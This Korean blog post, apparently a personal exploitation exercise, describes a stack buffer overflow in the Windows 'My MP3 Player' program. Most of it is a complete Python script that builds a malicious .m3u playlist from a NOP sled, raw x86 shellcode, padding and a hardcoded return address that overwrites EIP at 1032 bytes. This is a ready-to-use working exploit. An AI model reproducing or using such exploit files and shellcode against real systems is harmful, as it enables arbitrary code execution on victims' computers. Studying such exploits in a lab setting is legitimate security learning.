ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • My MP3 Player - Stack Overflow
    Hack/Windows 2016. 6. 4. 22:53



    보호기법 증말없다. 엄청쉽다. 이거하고 보호기법 걸린거 해야지


    EIP는 1032바이트에서부터 바뀌더라구요


    다른모듈에도 ASLR은 안걸려있지만 jmp esp 가젯은 존재하지않았습니다. 그래서 그냥 버퍼에 놉 슬레딩해주고 쉘코드넣어서 익스플로잇을했어요


    import struct
    import os,sys,time
    from subprocess import *
    p = lambda x:struct.pack("<L",x)
    up = lambda x:struct.unpack("<L",x)
    
    
    
    
    shellcode = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x69\x21\x21\x01\x68\x67\x73\x61\x72\x68\x20\x73\x30\x6e\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"
    
    payload = "\x90"*100
    payload += shellcode
    payload += "\x90"*(1024-len(payload))
    payload += p(0x18e404)
    
    
    
    f = open("test.m3u","w")
    f.write(payload)
    f.close()
    # print payload
    # proc.stdin.write(payload)
    






    'Hack > Windows' 카테고리의 다른 글

    Easy RM Convert MP3 Exploit  (0) 2016.06.14
    CoolPlayer Overflow  (0) 2016.06.03
    Windows ROP  (0) 2016.06.03
    Windows RTL  (0) 2016.06.02
    SafeSEH 우회  (0) 2016.06.02

    댓글

Designed by Tistory.